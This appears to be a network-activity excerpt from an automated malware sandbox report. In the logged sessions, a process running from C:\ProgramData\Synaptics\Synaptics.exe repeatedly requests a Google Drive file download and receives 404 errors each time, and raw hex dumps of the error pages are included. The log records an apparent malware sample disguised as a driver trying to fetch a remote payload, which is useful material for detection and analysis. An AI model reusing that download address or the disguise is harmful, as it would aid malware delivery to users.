                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC78INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-xLDmZzE8U_Q17M8WWwO6Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC79INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 6e 4f 54 61 6e 2d 69 47 78 34 66 53 77 52 38 4b 57 56 44 62 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UnOTan-iGx4fSwR8KWVDbQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC81INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC81INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          26192.168.2.349771172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC78OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC81INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:23 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-q_WwuXe4XGTluFaUH4GtEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC82INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC82INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 50 35 71 69 72 5a 6a 2d 5a 5a 34 47 4e 5f 4a 59 2d 71 55 42 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wP5qirZj-ZZ4GN_JY-qUBg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC83INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC84INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          27192.168.2.349772172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:23 UTC81OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC84INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:24 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-j4jchXbwVQLmIeHkuwST4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC85INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC85INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 71 49 6e 70 41 62 34 71 2d 55 41 30 70 35 41 70 39 45 75 41 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HqInpAb4q-UA0p5Ap9EuAQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC86INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC87INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          28192.168.2.349773172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC84OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC87INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:24 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-F69_pKNlsi_vh4bFmrC-yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC88INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 5f 63 63 48 41 5f 55 56 56 69 38 4d 35 55 32 6a 48 33 65 51 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="J_ccHA_UVVi8M5U2jH3eQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC90INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC90INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          29192.168.2.349776172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC87OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC90INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:24 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-00CzyXufRNr6eJhID_c9KA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC92INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 53 78 54 52 53 48 69 77 65 66 66 6a 73 71 36 6e 4e 33 4b 54 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8SxTRSHiweffjsq6nN3KTA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC93INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:24 UTC93INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          3192.168.2.349742172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:17 UTC6OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:17 UTC9INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:17 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
